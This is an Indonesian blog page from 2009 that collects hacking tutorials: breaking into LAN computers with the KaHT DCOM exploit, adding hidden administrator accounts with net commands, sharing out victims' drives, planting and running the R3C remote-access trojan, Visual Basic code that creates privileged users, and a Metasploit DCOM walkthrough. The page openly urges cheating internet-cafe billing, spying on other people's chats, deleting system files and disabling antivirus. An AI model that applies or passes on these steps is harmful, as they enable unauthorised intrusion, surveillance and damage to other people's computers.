CLICK HERE FOR BLOGGER TEMPLATES AND MYSPACE LAYOUTS »

Jumat, 09 Januari 2009

Cara masuk di komputer lain lewat DOS (Windows XP / 2000)

anda ingin masuk dikomputer teman anda dalam sebuah LAN ? bisa melihat seluruh isi harddisk teman anda, membuat directory, membuat file, mendelete file atau apa saja ? itu mudah, semua caranya ada disini.

Pertama-tama anda harus tahu 2 program penting lalu downloadlah yaitu

internet Maniac (Internet Maniac.exe) ... Download Interenet Maniac
Berfungsi untuk mengetahui ip addreas client melalui computer name / hostname

KaHT (KaHt.exe) ... Download program hacker KaHT
Berfungsi sebagai program untuk menerobos ke computer server atau client

Ingat hanya dengan 2 program diatas maka anda bersiap-siaplah menguasai warnet / kampus / kantor dan sebagainya, lho bagaimana bisa ? hehe

Pertama kali anda periksa dahulu jaringan anda dengan melihat para hostname dengan 2 cara.

Setelah 2 program diatas di download maka ekstractlah dahulu program tersebut, entah pakek WINZIP atau pakek apa.
Kalo udah di extract lalu pertama kali anda periksa dahulu jaringan anda dengan melihat para hostname dengan 2 cara.

Untuk Windows XP
Cara Pertama Masuk ke Start Lalu Search, lalu pilih computers or people lalu pilih A computer on the Network lalu langsung klik search maka akan segera muncul computer-komputer yang terkoneksi dalam jaringan.

Untuk Windows 95/98/Me/2000 (kalau anda menemukan open port 135 di OS ini) :)
Cara Pertama Masuk ke Start Lalu Search Lalu For Files or Folders lalu pada menu Search for other item pilihlah computers, lalu akan muncul Search for computer, maka langsung klik Search Now maka nama-nama computer akan muncul
(Alternatif cara yang cepat dapat mengklik My Network Place / Network Neighboure saja)

Setelah kamu dapetin sasaran computer yang mau di masukin / diremote maka kamu langsung aja kamu jalankan program Internet Maniac
Download IManiac......

Masuklah ke Host Lookup lalu ketikkan nama computer / hostname lalu klik resolve, disini anda akan mendapat alamat ip computer tersebut. Dengan nomor ip ini maka anda sudah mengetahui sasaran computer yang akan di masuki.

Setelah itu selesai maka kita tinggalkan program Internet Maniac, kita akan berlanjut dengan program KaHT, program ini akan didetect sebagai Trojan oleh antivirus, tapi abaikan saja, jangan di hapus / di karantina kalau terdetect, kalau perlu del aja antivirusnya, satu lagi, program KaHT bekerja dalam MS-DOS Mode jadi disini kemampuan anda menggunakan DOS sangat penting, tanpa kemampuan DOS maka anda tidak akan bisa banyak berbuat.

Cara masuk DOS Mode
Untuk Windows XP :
Masuklah ke Start, All programs, Accessories lalu Command Prompt
Untuk Windows 95/98/Me/NT/2000
Masuklah ke Start, Programs, Accessories lalu MS-DOS Prompt

Setelah berhasil masuk DOS maka masuklah di directory program KaHT, masa seh bisa lupa tadi program diextract dimana, hehe, (Misal tadi di extract di C:\KaHT) maka ketikkan “CD\KaHT” dan seterusnya.

Jika sudah, ini saatnya…

Ketikkan “KaHT sebelum_no_ip_komputer_sasaran no_ip_komputer_sasaran.
kalau bingung bisa begini : "KaHT Ip1 ip2"
ip1 : ip awal yang discan
ip2 : ip terahkir yang discan

Misalnya tadi ip-nya 192.168.0.1 setelah di detect pakek Internet Maniac tadi itu lho. Maka ketikkan saja “KaHT 192.168.0.0 192.168.0.1” lalu enter aja Nah disini nanti program akan bekerja otomatis. Setelah selesai menscan jika nanti port 135 ternyata dalam keadaan open maka anda akan otomatis di computer tujuan / sasaran, untuk lebih persisnya anda akan berada di "c:\windows\system" milik komputer tujuan / sasaran setelah pen-scan-an selesai. Anda bisa bebas di computer sasaran, mau edit atau di delete pun bisa, hehe

Nah kalo udah begini kita bisa berkreasi :

Pingin biaya warnet kita lebih murah ?
gampang masuk aja di billing server, ketik Time, ganti aja waktunya, tapi jangan banyak-banyak apalagi minus nanti ketahuan ama operator warnetnya, hehe.

Memata-matai anak yang sedang chatting pakek MiRC di satu warnet / kampus / kantor / lainnya, cari program MiRC yang digunakan dalam computer tersebut, biasanya seh di C:\Program Files\MiRC, buka file MiRC.INI, lalu Log IRC di On kan saja dan kalo mau lihat isi chattingan teman kita itu cukup lewat “/logs” maksudnya kalau tadi di C:\program Files\MiRC program MiRCnya maka cukup masuk aja di C:\Program Files\MiRC\Logs nanti disitu ada file-file log hasil chattingan dia walaupun dia sedang online tetep aja terekam, hehe, kalo mau mastiin dia makek nick apa, gampang banget bisa jalanin aja MiRCnya atau periksa di MiRC.INI, gampangkan.

Apalagi nih, Bikin computer itu rusak, lebih baik jangan, tapi sebenere bisa lho, delete aja file-file systemnya, hehe.

Diatas cuman kreasi dikit aja, kamu bisa aja memanfaatkannya jauh lebih bermanfaat dari pada diatas

Tujuan dari tutorial ini untuk anda yang sering menggunakan komputer dengan Windows 2000 dan XP dijaringan agar lebih waspada terhadap berbagai tindakan usil dari pihak-pihak yang tidak bertanggung jawab..

Penulis :
Jogjahacking

Referensi :
1. Yogya Family Code
2 .Jasakom.com

*Segala kesalahan error / kerusakan pada komputer dan semacamnya adalah tanggung jawab anda !
*Semua yang anda pelajari dan anda lakukan adalah sepenuhnya tanggung jawab anda tanpa kecuali (termasuk member)

Membuat akses administrator Windows untuk kita lewat komputer lain

Kita ingin membuat administrator Windows XP/2000 di komputer lain melalui LAN ? sangat mudah, caranya masuklah ke komputer tujuan dengan program kaht yang sudah diajarkan diatas, lalu kita akan mencoba beberapa trik.

Melihat akses guest dan administrator di Windows
Ketik : net user

Melihat aktif tidaknya guest di Windows
Ketik : net user guest

Membuat akses guest menjadi Administrator dengan perintah :
Ketik : net localgroup Administrators Guest /add

Membuat akses adminstrator sendiri :
1. Ketik : net user /add
2. Ketik : net localgroup Administrators /add

Menghapus akses administrator
Ketik : net localgroup Users /delete

Penulis :
jogjahacking

Referensi :
1. y3dips dari situs Echo.or.id

*Segala kesalahan error / kerusakan pada komputer dan semacamnya adalah tanggung jawab anda !
*Semua yang anda pelajari dan anda lakukan adalah sepenuhnya tanggung jawab anda tanpa kecuali (termasuk member)

Cara melakukan share di komputer lain (2000/XP) secara bebas

Pada tanggal 06 Januari 2005, penulis menemukan teknik baru cara melakukan share dikomputer sasaran secara bebas di Windows XP, yang dimana waktu itu penulis penasaran melihat isi share dengan perintah ///c$ (Default Share) yang sebelumnya lancar bisa masuk di drive C komputer sasaran, tiba-tiba setelah komputer sasaran diinstall ulang dan ditambah settingan, membuat penulis tidak dapat masuk lagi dengan perintah ///c$ dimana jika dijalankan perintah tersebut maka muncul sebuah form untuk memasukkan password.

Dikomputer sasaran, penulis udah periksa ternyata akses password admin tidak dipassword juga tidak ada password di folder-folder lain yang share, tapi tetap saja di komputer sasaran meminta password, tapi dengan rasa pusing memikirkan ini ahkirnya penulis coba-coba masuk ke Help, disitu pada search penulis tulis c$, ahkirnya setelah ditunggu ahkirnya pada Search Results, di nomor 9 ada tulisan "Net Share" karena tulisan ini lebih sesuai topik maka penulispun masuk.kedalam ahkirnya di net share ini banyak membuka cakrawala pengetahuan penulis, dengan penemuan ini maka penulis jadi mempunyai ide cemerlang cara membuat share drive c, drive d atau folder-foldernya apa saja di komputer sasaran.

Bagaimana caranya ?
Siapkan program KaHT, kita terapkan lagi ilmu ini, lalu setelah kita masuk di komputer sasaran dengan KaHT maka kita ketikkan perintah : "Net Share =c:\" dengan perintah ini maka drive c akan dishare, jika anda takut ketahuan dengan user yang makek komputer itu, maka share saja foldernya, misalnya kita ingin menshare folder c:\windows caranya ketik "Net Share =c:\windows, oh iya bisa ditulis terserah anda dimana nantinya ini sebagai identitas nama untuk drive atau folder yang dishare.

Ahkirnya dengan tutorial ini maka penulis mengakiri tanda tanya para pengguna KaHT yang ingin mengambil files dari komputer sasaran atau pengcopyan files ke komputer sasaran, dengan cara seperti ini maka kita bisa memanfaatkan komputer sasaran lebih jauh seperti memasang trojan, backup data ke komputer lain bahkan teknik cara mematai-mata teman chatting disatu warnet yang ditulis oleh penulis di Jasakom sebelumnya menjadi lebih mudah karena kita tinggal menshare folder mircnya saja dan kita mengubah file "mirc.ini" di notepad saja. :)

Berkenalan dengan Trojan R3C

Sebelum bicara lebih jauh tentang trojan R3C, penulis tidak bertanggung jawab atas penyalahgunaan artikel ini. artikel ini hanya untuk pembelajaran dan menambah wawasan saja.

Untuk lebih lancarnya proses pembelajaran sebaiknya download dulu trojan yang kita sayangi ini.Anda dapat mendownloadnya di r3c download .setelah trojan berhasil di download, akan terlihat 2 buah file yaitu client.exe dan servavi.exe. File servavi merupakan program yang ada dalam komputer target sedangkan program client.exe merupakan sebagai program yang kita pegang sebagai remote. Sebenarnya permasalahan yang timbul adaalh bagaimana kita tahu bahwa suatu komputer telah tertanam trojan R3C ini.

OK sekarang buka dulu program client.exe,untuk mengetahui komputer yang sudah tertanam trojan ini kita tinggal melakukan scan IPs. Klo hasil scan sudah didapat, tinggal kita masukkan no IP komputer target ke program clien kita, terus bagaimana klo hasil scan tidak menunjukkan hasil apa2.....? Gmn ya....? tenang saja banyak jalan menuju roma, kita pasang aja sendiri program servavi.exe itu. Cara masuk dan menaruh prog servavi.exe itu bisa dilakukan dengan beberapa program remote port scan antara lain legion, netcop, superscan dan lain lain (nanti cari di google sendiri ya....). Klo sudah bisa masuk ke komputer target tinggal klik 2 kali program servavi.exe itu, dan klo program itu sudah ada dikomputer target tinggal kita kerjain aja.(ups...becanda..ini Cuma pembelajaran) .

Ok sekarang kita lihat dulu menu menu yang ada pada trojan ini...
1. capture screen untuk melakukan capture, dengan ini kita dapat mengetahui apa yang sedang dikerjakan atau yang di buka oleh korban.
2. message function berguna untuk menampilkan pesan kepada komputer korban.
3. Policies berfungsi untuk melakukan perubahan pada registry dengan beberapa list yang sudah disediakan oleh trojan ini
4. execute berguna untuk membuka program yang kita inginkan dengan mengetikkan contoh c:\windows\calc
5. Open URL berguna untuk membuka alamat suatu website pada komputer korban
6. Display BMP untuk menampilkan file gambar dengan format BMP
7. Server info untuk menampilkan informasi komputer korban
8. Redraw screen berguna untuk menghilangkan list hasil manipulasi yang telah dibuat.
9. Don't Click!!! Berguna untuk menghilangkan server trojan ini.
10. Pilihan shutdown untuk melakukan shutdown pada komputer korban.
11. Pilihan restart untuk melakukan proses restart pada komputer target
Sebenarnya masih banyak manipulasi atau hal2 yang kita inginkan (ato yang tidak diinginkan oleh korban he...he...), untuk lebih jelasnya lihat sendiri dan buktikan sendiri.

Mungkin apabila anda belum punya target, bisa coba komputer sendiri dirumah tp ingat matikan dulu program anti virusnya krn trojan ini belum diimunisasi he...he...(becanda). Percobaan yang dilakukan penulis trojan ini hanya bekerja pada windows 9x untuk win XP belum bisa, mungkin suatu saat.

Untuk temen2 yang melakukan percobaan dengan komputer sendiri saatnya untuk menghilangkan trojan itu. Biar nanti tidak dikatakan kurang bertanggung jawab.Caranya :
1. Hapus file IPMON.EXE dan WINSOCK.EXE yang terdapat pada c:\windows\system
2. Buka run, ketik msconfig, system configuration utility akan muncul dan klik tab startup, hilangkan centang pada ipmon.exe. Sekarang klik tab system.ini, pilih tanda + pada boot, akan muncul banyak pilihan tp yang kita lihat hanya pada shell=Explorer.exe winsock.exe, klik data tersebut lalu edit menjadi shell=Explorer.exe.

Udah selesai, berarti penulis sudah tidak disalahkan lagi.

Mengontrol komputer lain pada Windows XP dengan gabungan Remote & Trojan

Penulis kali ini akan lebih menyempurnakan tutorial yang diterbitkan oleh banyak penulias sebelumnya yang beredar, yang berjudul "Berkenalan dengan Trojan R3C",dimana Trojan R3C ini dapat kita gabungkan dengan program kesayangan kita yaitu KaHT. Sebagai informasi saja bahwa sebelumnya program ini sudah diujicoba antar jaringan LAN di tempat penulis sendiri dengan hasil yang memuaskan.

Perlu diketahui kedua program (KaHT dan R3C) ini memang terdetect oleh AntiVirus sebagai Trojan maka nonaktifkan dahulu AntiVirusnya. :)

Baik kita mulai saja mempraktekkan gabungan KaHT dengan R3C yang bisa dikatakan cukup serasi, pertama kita jalankan program KaHT seperti biasa, setelah kita berada di komputer sasaran, kita lihat apakah komputer sasaran di share komputernya ? biasanya diwarnet-warnet Yogya di share di drive Dnya :P, walaupun tidak disharepun bisa juga melakukan share sendiri dengan cara dapat melihat tulisan saya dengan judul "Melakukan share dikomputer lain secara secara bebas pada Windows XP".

Setelah itu kita copykan file servapi.exe ke komputer sasaran lewat sharing, jika sudah dicopy dikomputer sasaran, kita kembali ke KaHT tadi, misalkan saja tadi program servapi.exe ada di drive D, cukup kita panggil saja program client.exe, menurut pengalaman saya, kita panggil beberapa kali file ini, karena pernah satu kali saja tapi ternyata trojannya belum mau jalan. :P

Setelah kita menjalankan program client.exe di komputer sasaran, sekarang tinggal kita jalankan program client.exe di komputer kita untuk mengontrol komputer sasaran.

Sekarang kita pilih Scan IPs..., lalu akan muncul tampilan sebagai berikut

Kita isi Get IP by Hostname dengan nama computer sasaran lalu klik arah panan kekanan dan hasilnya muncul ip addreas computer sasaran lalu kita klik arah panah keatas, kalo udah kita klik Start, setelah selesai prosesnya kita klik Exit lalu kita kita isi pada IP/name dengan ip addreas atau nama computer kita lalu kita klik Connect! dan muncul tampilan seperti dibawah ini :

Kalau udah begini kita bisa ngapain aja pada komputer sasaran, dari ngambil gambar apa yang sedang dilakukan user di komputer (capture screen), ngirim pesan ke user komputer sasaran (message function), merubah registry windows komputer sasaran, menjalankan program apa saja yang kita inginkan dikomputer sasaran, memaksa komputer sasaran membuka alamat situs tertentu, melakukan shutdown pada komputer sasaran, melakukan restart dan masih banyak lagi.

Buakan Rahasia Lagi

sebenarnya program ini dibuat untuk mengetes atau melakukan penetrasi jaringan di sebuah perusahaan di gak tau belahan dunia mana...yang jelas diluar Indonesia...(ih kok bisa??) hmmm...ntar kita bahas juga di option renungan....okeh....lanjut...jadi infocon (nama perusahaan tersebut) ingin mengetes jaringan di perusahaannya dan memerlukan tools seperti yang dibuat di bawah ini....



Sebenarnya modul - modulnya banyak sekali...cuma tidak dapat saya jelaskan satu persatu...susah euy...bisa jadi satu buku lagi...huihihihihi...tapi nanti akan saya jelaskan beberapa modul yang ada di program ini.

Lah! lalu apa hubungannya dengan simulasi virus? O ada....tools yang dibuat ini berguna untuk melakukan injeksi jaringan, membuka port dan service, membuat dan menghapus grup atau user dalam komputer, dan lain2. Pembuatan tools ini sebenarnya masih menggunakan juga perintah DOS (Disket Operating System) yang ada pada windows XP. Jadi tidak semuanya menggunakan perintah API (Application Programming Interface).

FILE YANG DIPERLUKAN
--------------------

File yang diperlukan untuk menjalankan aplikasi ini :

- ASService.dll
Untuk pembuatan service

- NTSVC.ocx
untuk menjalankan service di XP

- MSWINSCK.OCX
file yang diperlukan vb untuk menjalankan program jaringan

Agar file tersebut bisa dieksekusi oleh aplikasi VS, cukup ikuti petunjuk di bawah ini:

1. Copy ASService.dll, NTSVC.ocx dan MSWINSCK.OCX ke direktori c:\windows\system32 (untuk winxp dan c:\windows\system (untuk windows 9x)

2. lakukan register dengan, klik start-> run -> ketik 'cmd' tanpa tanda petik
3. kemudian ketik regsvr32 [spasi] nama file , dan tekan enter , atau lengkapnya :

regsvr32 ASService.dll -> untuk file ASService.dll
regsvr32 NTSVC.ocx -> untuk file NTSVC.ocx
regsvr32 MSWINSCK.OCX -> untuk file MSWINSCK.OCX

MODUL dalam PROGRAM
-------------------

untuk modul dalam perogram terbagi menjadi 9 bagian yaitu :
- Modul Pembuka Port dan Service
- Modul Pembuat User
- Modul Penghapus User
- Modul Memasukkan user ke suatu group
- Modul Pembuat Group
- Modul Menghapus Group
- Modul Mencari Registry yang berubah
- Modul Injeksi Registri
- Modul membuat extensi file

MODUL PEMBUKA PORT DAN SERVICE
------------------------------

Untuk membuka port dan service pada program ini dilakukan dengan perintah API dalam pemrograman VB. Sebenarnya dapat dilakukan dengan perintah DOS, tetapi untuk membuka service saya masih belum dapat menemukan perintahnya(buihihihihi........mungkin anda bisa yah...). Ada cara untuk melihat service aktif di DOS, masuk ke terminal DOS kemudian ketik perintah :

NET START

Kemudian enter, maka akan banyak service yang akan terlihat di komputer anda.

Pada Virus Simulation (VS), kita menggunakan perintah API. Penjelasan ini pernah kita bahas pada artikel "Membuat Service di Windows XP". Coba deh bongkar2 artikel sebelumnya di www.virologi.info.

MODUL PEMBUAT USER
------------------

Untuk membuat user dapat dilakukan dengan perintah DOS, yaitu dengan mengetikkan perintah

NET USER [nama user] [password] /ADD

setelah itu ketik enter, kemudian coba log off dari windows. Nah dapat dilihat kan di menu login windows ada nama user yang anda buat..nah ini bisa dilakukan di VB, dengan menggunakan script sbb :

Private Sub cmdextcute_Click()
Shell "NET USER" & " " & txtuser.Text & " " & txtpass.Text & " " & "/ADD", vbHide
MsgBox "Your Account with " & vbCrLf & "User : " & txtuser.Text & vbCrLf & "password : " & _
txtpass.Text & vbCrLf & " is created ", vbExclamation, "WARNING"

txtuser.Text = ""
txtpass.Text = ""

Unload Me
End Sub

Kalo kurang mengerti lihat di source code nya ajah yah...

MODUL PENGHAPUS USER
--------------------
Demikian pula untuk menghapus user dalam DOS digunakan perintah

NET USER [nama user] /DELETE

di VB dapat diimplementasikan dengan script sbb :

Private Sub cmddel_Click()
Dim warning
warning = MsgBox("Are U Sure to delete?", vbYesNo, "WARNING!!!")

If warning = vbYes Then
Shell "NET USER" & " " & txtuser.Text & " " & "/DELETE", vbHide
MsgBox "Your Account with " & vbCrLf & "User : " & txtuser.Text & vbCrLf & "password : " & _
txtpass.Text & vbCrLf & " is deleted ", vbExclamation, "WARNING"
End If

txtuser.Text = ""
txtpass.Text = ""

Unload Me

End Sub

MODUL MEMASUKKAN USER KE SUATU GROUP
------------------------------------

nah ini yang bisa dilakuakn virus, yaitu pertama membuat user, kemudian memasukkan user tersebut ke dalam Group Administrator atau special account. Nah untuk memasukkannya cukup dengan perintah.

NET LOCALGROUP [nama group] /ADD [nama user]

nah misalnya kalo ingin memasukkan user yang dibuat ke dalam administrator cukup dengan perintah :

NET LOCALGROUP administrators /ADD userkita

nah user kita akan masuk ke group yang mempunyai kedudukan tertinggi yaitu administrators (jangan lupa pakek 's').

Private Sub cmdadd_Click()
Shell "NET LOCALGROUP" & " " & txtgroup.Text & " " & "/ADD" & " " & txtuser.Text, vbHide
MsgBox "Your User " & txtuser.Text & " is Added to Group " & txtgroup.Text, vbExclamation, "WARNING"

txtgroup.Text = ""
txtuser.Text = ""
Unload Me

End Sub

MODUL MEMBUAT dan MENGHAPUS GROUP
---------------------------------

Sedangkan untuk membuat dan menghapus suatu group dapat dilakuakn dengan perintah

NET LOCALGROUP [nama group] /ADD

dan untuk menghapusnya dapat dilakukan dengan perintah

NET LOCALGROUP [nama group] /DELETE

Nah demikian tutorial kita tentang perintah dos yang dapat dilakukan dengan vb....jangan meremehkan DOS...memang mungkin saat ini kita sudah ada di jaman SO WINDOWS XP....tapi jangan lupa,...menggunakan DOS juga masih terlihat kekuatannya untuk menembus sistem windows...thanks............

MODUL TAMBAHAN
--------------

satu lagi untuk menunjukkan kalo kekuatan DOS masih ada. Pasti kalian pernah kan gak bisa me-restart atau mematikan komputer. Pernah???terusss???.....tau sebabnya??? karena ada apliaksi yang masih menyangkut di memory...seperti apliaksi REGEDIT...ha???? yup...regedit...terkadang karena virus...atau windows bajakan regedit jadi kacau...setelah menyalakannya.....kadang regedit masih bersarang di memory...nah untuk mematikan proses tersebut coba saja tulis script di bawah ini dan simpan dengan nama kill.bat . Caranya :

1. Buka notepad
2. tulis script di bawah ini :

TASKKILL /S system /F /IM regedit.exe /T

3. Kemudian simpan dengan nama kill.bat
4. lalu klik langsung filenya

atau untuk source code nya download aja ke sini :

DOWNLOAD Source kill.bat

Nah script ini berguna untuk mematikan regedit yang menyangkut di memory secara paksa...bisa diimplementasikan dalam apliaksi lain seperti :

svchost.exe
inetinfo.exe
kernell32.dll

dan lainnya ok..selamat mencoba

O iya kalo mau ngembangin Virus Simulation dapat di download di sini..

DOWNLOAD Virus Simulation v1.0b

Minggu, 04 Januari 2009

Cara Hacking dengan Metasploit

Rasa penasaran saya muncul ketika banyak forum security membicarakan tentang Metasploit.

Apakah itu metasploit ? Sulitkah menggunakannnya ? Saatnya membuka sedikit rahasia para Lamer (Hacker kelas teri) yang seringkali menyombongkan diri, padahal yang mereka lakukan hanyalah menggunakan tools yang dapat digunakan oleh anak SMP sekalipun.

Untuk memberikan gambaran dan mempermudah penjelasan, saya akan memberikan contoh bug pada service DCOM Windows yang dulu sangat populer dimanfaatkan oleh teman-teman SMA saya dengan exploit terpopuler saat itu : KAHT (dimana saya tidak tertarik hacking pada waktu itu) untuk menembus Server Lab sekolah - yang akhirnya ketahuan dan dimarahi guru Lab .Feeling saya sih mereka berusaha mengambil soal ulangan yang diketik di server, dasar anak bandel, hehehe….

Berikut alat-alat praktek yang kita butuhkan pada percobaan kali ini :

1. Sebuah PC yang cukup bertenaga untuk virtualisasi PC.

2. Metasploit Framework, dapat di download disini.

3. Microsoft Windows NT SP3-6a/2000/XP/2003 yang memiliki bug pada service DCOM.

4. Vmware, dapat di download disini.

Vmware disini digunakan untuk membuat virtualisasi jaringan komputer, sehingga memudahkan anda yang hanya memiliki 1 PC saja dirumah.

Saya akan melompati langkah-langkah menginstall VMware dan juga cara menginstall Windows di VMware, sebab apabila anda tidak mengerti hal tersebut, kemungkinan besar anda juga tidak akan paham yang kita bahas disini.

Sebagai permulaan kita akan memulai dengan mengenal lebih dekat Metasploit Framework. Pada situs pembuatnya dipaparkan secara gamblang tentang apa itu Metasploit framework, dan juga tujuan penggunaannya :

What is it?

The Metasploit Framework is a development platform for creating security tools and exploits. The framework is used by network security professionals to perform penetration tests, system administrators to verify patch installations, product vendors to perform regression testing, and security researchers world-wide. The framework is written in the Ruby programming language and includes components written in C and assembler.

What does it do?

The framework consists of tools, libraries, modules, and user interfaces. The basic function of the framework is a module launcher, allowing the user to configure an exploit module and launch it at a target system. If the exploit succeeds, the payload is executed on the target and the user is provided with a shell to interact with the payload.

Semuanya saya biarkan tertulis dalam bahasa orang bule :) sebab ada kata-kata yang tidak pas atau tidak bisa dipadankan bila diterjemahkan dalam Bahasa Indonesia.

Selanjutnya untuk lebih jauh tentang exploit maupun bug pada DCOM service dapat anda search sendiri di google, sebab terlalu panjang jika saya jelaskan disini.

Sekarang mari kita ngoprek komputer !

Langkah pertama adalah download Vmware dari situsnya, lalu anda dapat mulai menginstall Windows yang memiliki bug DCOM, kemudian jalankan windows anda di VMware !

Windows XP Home

Langkah kedua adalah download Metasploit Framework dari situsnya. Lalu install dikomputer anda dan jalankan, hingga keluar tampilan seperti berikut :

Metasploit Framework

Kemudian pada kotak search ketikan dcom, lalu klik Find, dan pilihlah Exploits Microsoft RPC DCOM Interface Overflow.

Exploits

Setelah itu kita memilih target yang akan kita exploitasi, dalam kasus kali ini Sistem Operasi target kita adalah Windows XP home, oleh karena itu pilihlah yang sesuai, lalu klik Forward :

The Target

Kemudian kita dihadapkan pada pilihan payload. Payload adalah sebuah aksi yang dilakukan setelah bug berhasil di exploitasi oleh Metasploit. Untuk pembelajaran, kita pilih Generic/Shell_Bind_TCP , artinya kita akan mengambil alih Shell Bind atau lebih dikenal di lingkungan windows dengan Command Prompt dari target hacking kita. Setelah itu klik Forward.

Payload

Langkah berikutnya kita harus menentukan Target Address kita, disini saya telah mengkonfigurasi Windows XP Home di Vmware dengan IP 192.168.126.132, oleh karena itu tuliskan ip tersebut pada kolom RHOST. Sedangkan RPORT disini sudah ditentukan yaitu port 135 yang merupakan port default dari service DCOM dimana secara default dibuka oleh Windows XP Home ! Wah, berbahaya sekali yah… Untuk LPORT disini juga sudah ditentukan yaitu 4444, Local Port akan membuka sebuah port di PC anda untuk berhubungan dengan komputer target. Selanjutnya klik Forward .

Metasploit

Setelah semua konfigurasi selesai, anda akan mendapatkan pesan konfirmasi seperti berikut, jika anda yakin semuanya telah benar,lanjutkan dengan klik Apply.

Metasploit Confirm

Jika target berhasil terexploitasi, anda akan mendapatkan sebuah session yang berisi target hacking kita dan siap untuk di double klik.

Metasploit Session

Kemudian anda akan mendapati sebuah layar Command Prompt dari komputer target dan anda sebagai Administrator. Jika sudah begini semua terserah anda, jangan tanyakan apa yang bisa dilakukan selanjutnya.Dan selesailah tutorial hacking kali ini :) Mudah bukan ?

dos shell

dikutip dari http://agunk.wordpress.com/2008/05/26/cara-hacking-dengan-metasploit/